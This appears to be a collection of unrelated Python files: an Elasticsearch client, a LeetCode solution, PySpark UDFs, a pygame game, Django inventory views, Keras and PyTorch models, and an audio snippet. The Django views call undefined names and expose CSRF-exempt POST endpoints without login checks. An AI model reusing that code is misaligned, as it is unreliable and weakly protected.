for param in (name, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return await self.transport.perform_request(
"PUT",
_make_path("_autoscaling", "policy", name),
params=params,
headers=headers,
body=body,
)
@query_params()
async def get_autoscaling_policy(self, name, params=None, headers=None):
"""
Retrieves an autoscaling policy.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-policy.html>`_
:arg name: the name of the autoscaling policy
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return await self.transport.perform_request(
"GET",
_make_path("_autoscaling", "policy", name),
params=params,
headers=headers,
)
|
# 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
#
# 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
#
# 你可以假设除了整数 0 之外,这个整数不会以零开头。
#
# 示例 1:
#
# 输入: [1,2,3]
# 输出: [1,2,4]
# 解释: 输入数组表示数字 123。
#
#
# 示例 2:
#
# 输入: [4,3,2,1]
# 输出: [4,3,2,2]
# 解释: 输入数组表示数字 4321。
#
# Related Topics 数组
# leetcode submit region begin(Prohibit modification and deletion)
class Solution:
def plusOne(self, digits: List[int]) -> List[int]:
num = int("".join([str(d) for d in digits])) + 1
return [int(d) for d in list(str(num))]
# leetcode submit region end(Prohibit modification and deletion)
|
from pyspark.sql.functions import udf
from pyspark.sql.types import ArrayType, StringType, BooleanType
from ctutil import iputil
import traceback
def regist_long2ip_udf(ss, logger):
'''将long类型转化成ip字符串'''
def handle(iplong):
if not iplong:
return None
try:
if iplong == 0:
return None
return iputil.long2ip(iplong)
except:
logger.error(traceback.format_exc(), event="long2ip_udf")
return None
long2ip_udf = udf(lambda iplong: handle(iplong), StringType())
ss.udf.register("long2ip_udf", long2ip_udf)
return long2ip_udf
def regist_is_ipv4_udf(ss, logger):
'''判断是是否是ipv4'''
is_ipv4_udf = udf(lambda ipstr: iputil.is_ipv4(ipstr), BooleanType())
ss.udf.register("is_ipv4_udf", is_ipv4_udf)
return is_ipv4_udf
def regist_is_ipv6_udf(ss, logger):
'''判断是否是ipv6'''
is_ipv6_udf = udf(lambda ipstr: iputil.is_ipv6(ipstr), BooleanType())
ss.udf.register("is_ipv6_udf", is_ipv6_udf)
return is_ipv6_udf
|
#!/usr/bin/env python
import os
import re
from functools import lru_cache
import pygame
from glm import vec3, sign
from random import randint
from game.scene import Scene
from game.base.inputs import Inputs, Axis, Button, JoyAxis, JoyButton, JoyAxisTrigger
from game.base.state import State
from game.constants import CAMERA_OFFSET, SCRIPTS_DIR, DEBUG
from game.entities.camera import Camera
from game.entities.player import Player
from game.entities.terminal import Terminal
from game.entities.powerup import Powerup
from game.base.enemy import Enemy
from game.entities.buttabomber import ButtaBomber
from game.entities.flyer import Flyer
from game.util import pg_color, ncolor
from game.base.signal import SlotList
from game.base.stats import Stats
class Game(State):
def __init__(self, app, state=None):
super().__init__(app, state)
self.scene = Scene(self.app, self)
self.gui = Scene(self.app, self)
self.slots = SlotList()
self.paused = False
# self.scene.add(ButtaBomber(app, self.scene, vec3(0, 0, -3000)))
# self.scene.add(Powerup(app, self.scene, 'star', position=vec3(0, 0, -3000)))
# create terminal first since player init() writes to it
self.terminal = self.gui.add(Terminal(self.app, self.scene))
self.app.inputs = self.build_inputs()
self.camera = self.scene.add(Camera(app, self.scene, self.app.size))
stats = self.stats = self.app.data["stats"] = self.app.data.get(
"stats", Stats()
)
self.level = stats.level
self.player = self.scene.add(Player(app, self.scene, level=self.level))
# self.scripts += self.score_screen
# self.camera.slots.append(
# self.player.on_move.connect(lambda: self.camera.update_pos(self.player))
# )
self.debug = False
self.slots += [
app.inputs["debug"].on_press(lambda _: self.debug_mode(True)),
app.inputs["debug"].on_release(lambda _: self.debug_mode(False)),
]
self.slots += [
app.inputs["pause"].on_press(self.toggle_pause),
]
self.time = 0
# score backdrop
backdrop_h = int(24 * 1.8)
# draw a score backdrop
rows = 8
for i in range(rows):
h = int(backdrop_h) // rows
y = h * i
backdrop = pygame.Surface((self.app.size.x, h))
interp = i / rows
interp_inv = 1 - i / rows
backdrop.set_alpha(255 * interp * 0.4)
# backdrop.fill((0))
backdrop.fill(pg_color(ncolor("white") * interp_inv))
self.scene.on_render += lambda _, y=y, backdrop=backdrop: self.app.screen.blit(
backdrop, (0, y)
)
# backdrop = pygame.Surface((self.app.size.x, h))
# backdrop.set_alpha(255 * interp)
# backdrop.fill((0))
# backdrop_h = int(24)
# rows = 4
# for i in range(rows, 0, -1):
# h = (int(backdrop_h) // rows)
# y = h * i
# backdrop = pygame.Surface((self.app.size.x, h))
# interp = i/rows
# interp_inv = 1 - i/rows
# backdrop.set_alpha(200 * interp_inv)
# backdrop.fill((0))
# # backdrop.fill(pg_color(ncolor('black')*interp_inv))
# self.scene.on_render += lambda _, y=y,backdrop=backdrop: self.app.screen.blit(backdrop, (0,self.app.size.y-y))
# self.scene.on_render += lambda _: self.app.screen.blit(self.backdrop, (0,int(self.app.size.y-backdrop_h)))
# self.scripts += self.score_screen
def toggle_pause(self, *args):
if not self.player or not self.player.alive:
self.app.state = "game"
return
self.paused = not self.paused
if self.paused:
self.terminal.write_center(
"- GAME PAUSED -", 10,
)
# self.scene.play_sound('pause.wav')
else:
self.terminal.clear(10)
# self.scene.play_sound('pause.wav')
@staticmethod
@lru_cache(maxsize=1)
def level_count():
level_regex = re.compile("level(\\d+).py")
count = 0
for path in os.listdir(SCRIPTS_DIR):
if re.match(level_regex, path):
count += 1
return count + 1
@property
def level(self):
return self._level
@level.setter
def level(self, value):
self._level = value % self.level_count()
self.scene.script = f"level{self.level}"
def debug_mode(self, b):
self.debug = b
for i in range(9):
self.terminal.clear(13 + i)
if not b:
self.player.write_weapon_stats()
def pend(self):
# self.dirty = True
self.app.pend() # tell app we need to update
def update(self, dt):
"""
Called every frame by App as long as Game is the current app.state
:param dt: time since last frame in seconds
"""
if self.paused:
return
super().update(dt) # needed for state script (unused)
if self.scene.script and self.scene.script.done():
self.app.state = "intermission"
return
self.scene.update(dt)
self.gui.update(dt)
# Update the camera according to the player position
# And movement
self.camera.position = self.player.position + CAMERA_OFFSET
self.camera.up = vec3(0, 1, 0)
d = self.player.velocity.x / self.player.speed.x
if d:
self.camera.rotate_around_direction(-d * 0.05)
self.time += dt
assert self.scene.blocked == 0
def render(self):
"""
Clears screen and draws our scene to the screen
Called every frame by App as long as Game is the current app.state
"""
# Render Player's Position
# pos_display = "Position: {}".format(self.player.position)
# pos_pos = (self.terminal.size.x - len(pos_display), 0)
# self.terminal.write(pos_display, pos_pos)
# self.debug = True
if self.debug:
self.terminal.write(
"Sc/when: " + str(len(self.scene.script.when)) + " ", 14
)
self.terminal.write("S/when: " + str(len(self.scene.when)) + " ", 15)
self.terminal.write("SL: " + str(len(self.scene.slotlist)) + " ", 16)
self.terminal.write("Res: " + str(len(self.app.cache)) + " ", 17)
self.terminal.write(f"FPS low: {self.scene.lowest_fps} ", 18)
self.terminal.write(f"Pmax: {self.scene.max_particles} ", 19)
self.terminal.write(f"Entities: {len(self.scene.slots)} ", 20)
self.terminal.write(f"FPS: {self.app.fps} ", 21)
self.scene.render(self.camera)
self.gui.render(self.camera)
assert self.scene.blocked == 0
def build_inputs(self):
pg = pygame
pg.joystick.quit() # Reload
pg.joystick.init()
for j in range(pg.joystick.get_count()):
j = pg.joystick.Joystick(j)
j.init()
inputs = Inputs()
inputs["hmove"] = Axis(
(pg.K_LEFT, pg.K_a), (pg.K_RIGHT, pg.K_d), JoyAxis(0, 0), smooth=0.1
)
inputs["vmove"] = Axis(
(pg.K_DOWN, pg.K_s), (pg.K_UP, pg.K_w), JoyAxis(0, 1, True),
)
inputs["fire"] = Button(
pg.K_SPACE,
pg.K_RETURN,
JoyButton(0, 1),
JoyButton(0, 0),
JoyAxisTrigger(0, 2, 0),
JoyAxisTrigger(0, 5, 0),
)
inputs["debug"] = Button(pg.K_TAB)
inputs["switch-gun"] = Button(
pg.K_RSHIFT, pg.K_LSHIFT, JoyButton(0, 3), JoyButton(0, 2)
)
# inputs["test"] = Button(pg.K_p)
inputs["pause"] = Button(pg.K_ESCAPE, JoyButton(0, 6), JoyButton(0, 7))
return inputs
def restart(self):
"""
Called by player when() event after death
"""
# clear terminal
self.scene.clear_type(Enemy)
self.scene.clear_type(Powerup)
for x in range(2, 20):
self.terminal.clear()
self.level = self._level # retriggers
|
# -*- coding: utf-8 -*-
import json
from collections import OrderedDict
import six
from functools import update_wrapper
from django.contrib import messages
from django.conf import settings
from django.urls import reverse, reverse_lazy
from django.http import HttpResponse, JsonResponse, HttpResponseRedirect
from django.views import View
from django.views.generic.base import TemplateView
from django.views.generic.edit import FormView
from django.views.generic.base import RedirectView
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator, classonlymethod
from django.contrib.auth.mixins import LoginRequiredMixin
from formtools.wizard.views import SessionWizardView
from architect.views import JSONDataView
from .models import Inventory, Resource
from .forms import InventoryDeleteForm, \
ResourceDeleteForm, ResourceCreateForm
from .tasks import get_inventory_status_task, \
sync_inventory_resources_task
class InventoryListView(LoginRequiredMixin, TemplateView):
template_name = "inventory/inventory_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['inventory_list'] = Inventory.objects.order_by('name')
return context
class InventoryCheckView(LoginRequiredMixin, RedirectView):
permanent = False
query_string = True
pattern_name = 'inventory:inventory_list'
def get_redirect_url(self, *args, **kwargs):
inventories = Inventory.objects.all()
for inventory in inventories:
get_inventory_status_task.apply_async((inventory.name,))
messages.add_message(self.request,
messages.SUCCESS,
'Finished syncing of inventories.')
return super().get_redirect_url(*args, **kwargs)
class InventorySyncView(LoginRequiredMixin, RedirectView):
permanent = False
pattern_name = 'inventory:inventory_detail'
def get_redirect_url(self, *args, **kwargs):
sync_inventory_resources_task.apply_async(
(kwargs.get('inventory_name'),))
return super().get_redirect_url(*args, **kwargs)
class InventoryDetailView(LoginRequiredMixin, TemplateView):
template_name = "inventory/inventory_detail.html"
def get_context_data(self, **kwargs):
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
context = super().get_context_data(**kwargs)
context['inventory'] = inventory
if inventory.engine == 'hier-cluster':
context['service_formula_list'] = Resource.objects.filter(
inventory=inventory,
kind='service_formula')
context['service_class_list'] = Resource.objects.filter(
inventory=inventory,
kind='service_class')
context['system_unit_list'] = Resource.objects.filter(
inventory=inventory,
kind='system_unit')
context['system_class_list'] = Resource.objects.filter(
inventory=inventory,
kind='system_class')
context['cluster_class_list'] = Resource.objects.filter(
inventory=inventory,
kind='cluster_class')
context['cluster_unit_list'] = Resource.objects.filter(
inventory=inventory,
kind='cluster_unit')
return context
class InventoryDetailJSONView(JSONDataView):
def get_context_data(self, **kwargs):
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
return inventory.inventory()
class InventoryDeleteView(LoginRequiredMixin, FormView):
template_name = "base_form.html"
form_class = InventoryDeleteForm
success_url = '/inventory/v1/success'
def get_success_url(self):
return reverse('inventory:inventory_list')
def get_form_kwargs(self):
inventory_name = self.kwargs.get('inventory_name')
kwargs = super(InventoryDeleteView, self).get_form_kwargs()
kwargs.update({'initial': {'inventory_name': inventory_name}})
return kwargs
def form_valid(self, form):
form.handle()
return super().form_valid(form)
class ResourceDetailView(LoginRequiredMixin, TemplateView):
template_name = "inventory/resource_detail.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
context['inventory'] = inventory
context['resource_name'] = kwargs.get('resource_name')
resource_list = inventory.class_list()
context['class_list'] = resource_list[context['resource_name']]
return context
class ResourceDetailJSONView(JSONDataView):
def get_context_data(self, **kwargs):
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
# context = super().get_context_data(**kwargs)
return inventory.inventory(kwargs.get('resource_name'))
class ResourceCreateView(View):
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
return super(ResourceCreateView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponse('Only POST method is supported.')
def post(self, request, *args, **kwargs):
metadata = json.loads(request.body.decode("utf-8"))
manager_kwargs = {
'name': kwargs.get('master_id'),
'engine': 'saltstack',
}
update_client = SaltStackClient(**manager_kwargs)
metadata['manager'] = kwargs.get('master_id')
update_client.process_resource_metadata('salt_event', metadata)
cache_client = SaltStackClient(**manager_kwargs)
cache_client.refresh_cache()
return HttpResponse('OK')
class ResourceDeleteView(LoginRequiredMixin, FormView):
template_name = "base_form.html"
form_class = ResourceDeleteForm
success_url = '/inventory/v1/success'
def get_success_url(self):
return reverse('inventory:inventory_list')
def get_form_kwargs(self):
inventory_name = self.kwargs.get('inventory_name')
resource_name = self.kwargs.get('resource_name')
kwargs = super(ResourceDeleteView, self).get_form_kwargs()
kwargs.update({'initial': {
'inventory_name': inventory_name,
'resource_name': resource_name
}})
return kwargs
def form_valid(self, form):
form.handle()
return super().form_valid(form)
class ResourceClassifyView(View):
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
return super(ResourceClassifyView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponse('Only POST method is supported.')
def post(self, request, *args, **kwargs):
metadata = json.loads(request.body.decode("utf-8"))
manager_kwargs = {
'name': kwargs.get('master_id'),
'engine': 'saltstack',
}
return HttpResponse('OK')
class ClassGenerateView(LoginRequiredMixin, FormView):
template_name = "base_form.html"
form_class = ResourceCreateForm
def get_success_url(self):
return reverse('inventory:inventory_list')
def get_form_kwargs(self):
inventory_name = self.kwargs.get('inventory_name')
form_name = self.kwargs.get('form_name')
inventory = Inventory.objects.get(name=inventory_name)
form_meta = inventory.metadata['form'][form_name]['steps'][0]
kwargs = super(ClassGenerateView, self).get_form_kwargs()
kwargs.update({
'inventory': inventory,
'form_name': form_name,
'form_meta': inventory.metadata['form'][form_name],
'params': form_meta['fields']
})
return kwargs
def form_valid(self, form):
form.handle()
return super().form_valid(form)
class InventorySessionWizardView(SessionWizardView):
@classmethod
def get_initkwargs(cls, form_list=[], initial_dict=None, instance_dict=None,
condition_dict=None, *args, **kwargs):
kwargs.update({
'form_list': form_list,
'initial_dict': (
initial_dict or
kwargs.pop('initial_dict', getattr(cls, 'initial_dict', None)) or {}
),
'instance_dict': (
instance_dict or
kwargs.pop('instance_dict', getattr(cls, 'instance_dict', None)) or {}
),
'condition_dict': (
condition_dict or
kwargs.pop('condition_dict', getattr(cls, 'condition_dict', None)) or {}
)
})
return kwargs
def set_form_list(self, request, *args, **kwargs):
"""
Creates computed_form_list from the original form_list.
Separated from the original `set_initkwargs` method.
"""
# this will be created with some other magic later, now just hardcoded POC
inventory_name = self.kwargs.get('inventory_name')
form_name = self.kwargs.get('form_name')
inventory = Inventory.objects.get(name=inventory_name)
form_meta = inventory.metadata['form'][form_name]['steps'][0]
print(kwargs)
form_list = []
# form_list = [('contact_form_1', ContactForm1), ('contact_form_2', ContactForm2)]
computed_form_list = OrderedDict()
# walk through the passed form list
for i, form in enumerate(form_list):
if isinstance(form, (list, tuple)):
# if the element is a tuple, add the tuple to the new created
# sorted dictionary.
computed_form_list[six.text_type(form[0])] = form[1]
else:
# if not, add the form with a zero based counter as unicode
computed_form_list[six.text_type(i)] = form
# walk through the new created list of forms
for form in six.itervalues(computed_form_list):
if issubclass(form, formsets.BaseFormSet):
# if the element is based on BaseFormSet (FormSet/ModelFormSet)
# we need to override the form variable.
form = form.form
# check if any form contains a FileField, if yes, we need a
# file_storage added to the wizardview (by subclassing).
for field in six.itervalues(form.base_fields):
if (isinstance(field, forms.FileField) and
not hasattr(cls, 'file_storage')):
raise NoFileStorageConfigured(
"You need to define 'file_storage' in your "
"wizard view in order to handle file uploads."
)
self.form_list = computed_form_list
def dispatch(self, request, *args, **kwargs):
"""
This method gets called by the routing engine. The first argument is
`request` which contains a `HttpRequest` instance.
The request is stored in `self.request` for later use. The storage
instance is stored in `self.storage`.
After processing the request using the `dispatch` method, the
response gets updated by the storage engine (for example add cookies).
Override: construct `form_list` here and save it on view instance
"""
self.set_form_list(request, *args, **kwargs)
return super(GeneratedWizardView, self).dispatch(request, *args, **kwargs)
class ClassGenerateWizardView(InventorySessionWizardView):
template_name = 'inventory/model_generate.html'
def get_context_data(self, form, **kwargs):
context = super(ClassGenerateWizardView, self).get_context_data(form=form, **kwargs)
inventory_name = self.kwargs.get('inventory_name')
form_name = self.kwargs.get('form_name')
inventory = Inventory.objects.get(name=inventory_name)
form_meta = inventory.metadata['form'][form_name]
context.update({
'inventory': inventory,
'form_meta': form_meta
})
return context
def done(self, form_list, **kwargs):
return "" # HttpResponseRedirect(reverse_lazy('inventory:inventory_detail', kwargs['inventory_name']))
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 16 17:41:12 2020
@author: logun
"""
import matplotlib.pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout, Conv2D, MaxPooling2D
import tensorflow as tf
import numpy as np
import wandb
from wandb.keras import WandbCallback
# logging code
run = wandb.init(project="cnn_test")
config = run.config
# load data
(X_train, y_train), (X_test, y_test) = mnist.load_data()
one = np.array(X_test[2], dtype='float')
one = one.reshape((28, 28))
two = np.array(X_test[1], dtype='float')
two = two.reshape((28, 28))
seven = np.array(X_test[0], dtype='float')
seven = seven.reshape((28, 28))
## reshapes all images to to width = 28, height = 28,
#adds extra dimension for colour
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)
input_shape = (28,28,1)
X_train = X_train.astype("float32")
X_test = X_test.astype("float32")
labels = range(10)
X_train /= 255
X_test /= 255
model = Sequential()
##
model.add(Conv2D(28, kernel_size=(3,3), input_shape = input_shape, activation="relu"))
#model.add(Conv2D(32,
# (config.first_layer_conv_width, config.first_layer_conv_height),
# input_shape=input_shape,
# activation='relu'))
##Pooling: Shrinks Image
model.add(MaxPooling2D(pool_size = (3,3)))
model.add(Flatten())
model.add(Dense(128, activation =tf.nn.relu))
model.add(Dropout(0.2))
#10 is number of outputs
model.add(Dense(10, activation = tf.nn.softmax))
#sparse optional:
model.compile(loss='sparse_categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
# Fit the model
model.fit(X_train, y_train, epochs=10, validation_data=(X_test, y_test),
callbacks=[WandbCallback(labels=labels, data_type="image")])
image_index = 4444
plt.imshow(X_test[image_index].reshape(28, 28),cmap = plt.get_cmap("gray"))
pred = model.predict(X_test[image_index].reshape(1, 28, 28 , 1))
print(pred.argmax ())
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
def weights_init(init_type='gaussian'):
def init_fun(m):
classname = m.__class__.__name__
if (classname.find('Conv') == 0 or classname.find(
'Linear') == 0) and hasattr(m, 'weight'):
if init_type == 'gaussian':
nn.init.normal_(m.weight, 0.0, 0.02)
elif init_type == 'xavier':
nn.init.xavier_normal_(m.weight, gain=math.sqrt(2))
elif init_type == 'kaiming':
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
elif init_type == 'orthogonal':
nn.init.orthogonal_(m.weight, gain=math.sqrt(2))
elif init_type == 'default':
pass
else:
assert 0, "Unsupported initialization: {}".format(init_type)
if hasattr(m, 'bias') and m.bias is not None:
nn.init.constant_(m.bias, 0.0)
return init_fun
class RGBConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True):
super().__init__()
self.input_conv = nn.Conv2d(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, bias)
self.input_conv.apply(weights_init('kaiming'))
def forward(self, input):
return self.input_conv(input)
class RGBActiv(nn.Module):
def __init__(self, in_ch, out_ch, bn=True, sample='none-3', activ='relu',
conv_bias=False):
super().__init__()
if sample == 'down-5':
self.conv = RGBConv(in_ch, out_ch, 5, 2, 2, bias=conv_bias)
elif sample == 'down-7':
self.conv = RGBConv(in_ch, out_ch, 7, 2, 3, bias=conv_bias)
elif sample == 'down-3':
self.conv = RGBConv(in_ch, out_ch, 3, 2, 1, bias=conv_bias)
else:
self.conv = RGBConv(in_ch, out_ch, 3, 1, 1, bias=conv_bias)
if bn:
self.bn = nn.BatchNorm2d(out_ch)
if activ == 'relu':
self.activation = nn.ReLU()
elif activ == 'leaky':
self.activation = nn.LeakyReLU(negative_slope=0.2)
def forward(self, input):
h = self.conv(input)
if hasattr(self, 'bn'):
h = self.bn(h)
if hasattr(self, 'activation'):
h = self.activation(h)
return h
class PartialConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True):
super().__init__()
self.input_conv = nn.Conv2d(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, bias)
self.mask_conv = nn.Conv2d(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, False)
self.input_conv.apply(weights_init('kaiming'))
self.in_channels = in_channels
torch.nn.init.constant_(self.mask_conv.weight, 1.0)
# mask is not updated
for param in self.mask_conv.parameters():
param.requires_grad = False
def forward(self, input, mask):
# http://masc.cs.gmu.edu/wiki/partialconv
# C(X) = W^T * X + b, C(0) = b, D(M) = 1 * M + 0 = sum(M)
# W^T* (M .* X) / sum(M) + b = [C(M .* X) – C(0)] / D(M) + C(0)
#print("mask size: ", mask.size())
mask = mask[:, 1:2, :, :]
#print("mask size: ", mask.size())
mask = mask.repeat(1, self.in_channels, 1, 1)
#print("mask size: ", mask.size())
#print("input size: ", input.size())
output = self.input_conv(input * mask)
if self.input_conv.bias is not None:
output_bias = self.input_conv.bias.view(1, -1, 1, 1).expand_as(
output)
else:
output_bias = torch.zeros_like(output)
with torch.no_grad():
output_mask = self.mask_conv(mask)
no_update_holes = output_mask == 0
mask_sum = output_mask.masked_fill_(no_update_holes, 1.0)
output_pre = (output - output_bias) / mask_sum + output_bias
output = output_pre.masked_fill_(no_update_holes, 0.0)
new_mask = torch.ones_like(output)
new_mask = new_mask.masked_fill_(no_update_holes, 0.0)
return output, new_mask
class PCBActiv(nn.Module):
def __init__(self, in_ch, out_ch, bn=True, sample='none-3', activ='relu',
conv_bias=False):
super().__init__()
if sample == 'down-5':
self.conv = PartialConv(in_ch, out_ch, 5, 2, 2, bias=conv_bias)
elif sample == 'down-7':
self.conv = PartialConv(in_ch, out_ch, 7, 2, 3, bias=conv_bias)
elif sample == 'down-3':
self.conv = PartialConv(in_ch, out_ch, 3, 2, 1, bias=conv_bias)
else:
self.conv = PartialConv(in_ch, out_ch, 3, 1, 1, bias=conv_bias)
if bn:
self.bn = nn.BatchNorm2d(out_ch)
if activ == 'relu':
self.activation = nn.ReLU()
elif activ == 'leaky':
self.activation = nn.LeakyReLU(negative_slope=0.2)
def forward(self, input, input_mask):
h, h_mask = self.conv(input, input_mask)
if hasattr(self, 'bn'):
h = self.bn(h)
if hasattr(self, 'activation'):
h = self.activation(h)
return h, h_mask
class PConvUNet(nn.Module):
def __init__(self, layer_size=6, upsampling_mode='nearest'):
super().__init__()
self.freeze_enc_bn = False
self.upsampling_mode = upsampling_mode
self.layer_size = layer_size
self.d_enc_1 = PCBActiv(4, 64, bn=False, sample='down-7')
self.rgb_enc_1 = RGBActiv(3, 64, bn=False, sample='down-7')
self.d_enc_2 = PCBActiv(128, 128, sample='down-5')
self.rgb_enc_2 = RGBActiv(64, 128, bn=False, sample='down-5')
self.d_enc_3 = PCBActiv(256, 256, sample='down-5')
self.rgb_enc_3 = RGBActiv(128, 256, bn=False, sample='down-5')
self.d_enc_4 = PCBActiv(512, 256, sample='down-3')
self.rgb_enc_4 = RGBActiv(256, 256, bn=False, sample='down-3')
self.d_enc_5 = PCBActiv(512, 256, sample='down-3')
self.rgb_enc_5 = RGBActiv(256, 256, bn=False, sample='down-3')
self.d_enc_6 = PCBActiv(512, 256, sample='down-3')
self.rgb_enc_6 = RGBActiv(256, 256, bn=False, sample='down-3')
# takes in [rgb_enc_6, d_enc_6]
self.d_dec_6 = PCBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_6]
self.rgb_dec_6 = RGBActiv(256, 256, activ='leaky')
# takes in [rgb_enc_5, d_enc_5, rgb_dec_6, d_dec_6]
self.d_dec_5 = PCBActiv(256 + 256 + 256 + 256, 256, activ='leaky')
# takes in [rgb_enc_5, rgb_dec_6]
self.rgb_dec_5 = RGBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_4, d_enc_4, rgb_dec_5, d_dec_5]
self.d_dec_4 = PCBActiv(256 + 256 + 256 + 256, 256, activ='leaky')
self.rgb_dec_4 = RGBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_3, d_enc_3, rgb_dec_4, d_dec_4]
self.d_dec_3 = PCBActiv(256 + 256 + 256 + 256, 256, activ='leaky')
self.rgb_dec_3 = RGBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_2, d_enc_2, rgb_dec_3, d_dec_3]
self.d_dec_2 = PCBActiv(128 + 128 + 256 + 256, 128, activ='leaky')
self.rgb_dec_2 = RGBActiv(128 + 256, 128, activ='leaky')
# takes in [rgb_enc_1, d_enc_1, rgb_dec_2, d_dec_2]
self.d_dec_1 = PCBActiv(64 + 64 + 128 + 128, 64, bn=False, activ=None, conv_bias=True)
# technically just a dummy set of weights
self.rgb_dec_1 = RGBActiv(64 + 128, 64, bn=False, activ=None, conv_bias=True)
# takes in [rgb, masked_depth, rgb_dec_1, d_dec_1]
self.d_dec_0 = PCBActiv(64 + 64 + 4, 1, bn=False, activ=None, conv_bias=True)
def forward(self, rgb, masked_depth, input_mask):
d_dict = {} # for the output of the depth layers
rgb_dict = {} # for the output of the RGB layers
mask_dict = {} # for the mask outputs of the depth layers
rgb_dict['e_0'], d_dict['e_0'], mask_dict['e_0'] = rgb, masked_depth, input_mask
#print(rgb.size())
#print(masked_depth.size())
enc_key_prev = 'e_0'
for i in range(1, self.layer_size + 1):
enc_key = 'e_{:d}'.format(i)
# first, run it through the rgb convolutional layer
l_key = 'rgb_enc_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, rgb_dict[enc_key_prev].size()))
rgb_dict[enc_key] = getattr(self, l_key)(rgb_dict[enc_key_prev])
l_key = 'd_enc_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, torch.cat((d_dict[enc_key_prev], rgb_dict[enc_key_prev]), 1).size()))
d_dict[enc_key], mask_dict[enc_key] = getattr(self, l_key)(
torch.cat((d_dict[enc_key_prev], rgb_dict[enc_key_prev]), 1),
mask_dict[enc_key_prev])
enc_key_prev = enc_key
enc_key = 'e_{:d}'.format(self.layer_size)
h_rgb = getattr(self, 'rgb_dec_{:d}'.format(self.layer_size))(
rgb_dict[enc_key]
)
h_depth, h_mask = getattr(self, 'd_dec_{:d}'.format(self.layer_size))(
torch.cat((d_dict[enc_key], rgb_dict[enc_key]), 1),
mask_dict[enc_key]
)
for i in range(self.layer_size - 1, 0, -1):
enc_key = 'e_{:d}'.format(i)
h_rgb = F.interpolate(h_rgb, scale_factor=2, mode=self.upsampling_mode)
h_depth = F.interpolate(h_depth, scale_factor=2, mode=self.upsampling_mode)
h_mask = F.interpolate(h_mask, scale_factor=2, mode='nearest')
l_key = 'd_dec_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, torch.cat((rgb_dict[enc_key], h_rgb, d_dict[enc_key], h_depth), 1).size()))
h_depth, h_mask = getattr(self, l_key)(
torch.cat((rgb_dict[enc_key],
h_rgb,
d_dict[enc_key],
h_depth), 1),
torch.cat((h_mask, mask_dict[enc_key]), 1))
l_key = 'rgb_dec_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, torch.cat((rgb_dict[enc_key], h_rgb), 1).size()))
h_rgb = getattr(self, l_key)(
torch.cat((rgb_dict[enc_key], h_rgb), 1))
h_rgb = F.interpolate(h_rgb, scale_factor=2, mode=self.upsampling_mode)
h_depth = F.interpolate(h_depth, scale_factor=2, mode=self.upsampling_mode)
h_mask = F.interpolate(h_mask, scale_factor=2, mode='nearest')
h_depth, h_mask = self.d_dec_0(
torch.cat((rgb,
h_rgb,
masked_depth,
h_depth), 1),
h_mask
)
#print("done")
return h_depth, h_mask
def train(self, mode=True):
"""
Override the default train() to freeze the BN parameters
"""
super().train(mode)
if self.freeze_enc_bn:
for name, module in self.named_modules():
if isinstance(module, nn.BatchNorm2d) and 'enc' in name:
module.eval()
if __name__ == '__main__':
size = (1, 3, 5, 5)
input = torch.ones(size)
input_mask = torch.ones(size)
input_mask[:, :, 2:, :][:, :, :, 2:] = 0
conv = PartialConv(3, 3, 3, 1, 1)
l1 = nn.L1Loss()
input.requires_grad = True
output, output_mask = conv(input, input_mask)
loss = l1(output, torch.randn(1, 3, 5, 5))
loss.backward()
assert (torch.sum(input.grad != input.grad).item() == 0)
assert (torch.sum(torch.isnan(conv.input_conv.weight.grad)).item() == 0)
assert (torch.sum(torch.isnan(conv.input_conv.bias.grad)).item() == 0)
# model = PConvUNet()
# output, output_mask = model(input, input_mask)
|
from scipy.io import wavfile
import math
import matplotlib.pyplot as plt
import numpy as np
def moving_average(interval, window_size):
window = np.ones(int(window_size)) / float(window_size)
return np.convolve(interval, window, 'same')
audio_file = 'F:\Projects\Active Projects\Project Intern_IITB\Vowel Evaluation CH V2\Analyze\Vowel_Evaluation_V2_I1\\6.wav'
window_dur = 30
hop_dur = 5
fs, data = wavfile.read(audio_file) # Reading data from wav file in an array
data = data / float(2 ** 15) # Normalizing it to [-1,1] range from [-2^15,2^15]
window_size = int(window_dur * fs * 0.001) # Converting window length to samples
hop_size = int(hop_dur * fs * 0.001) # Converting hop length to samples
window_type = np.hanning(window_size) # Window type: Hanning (by default)
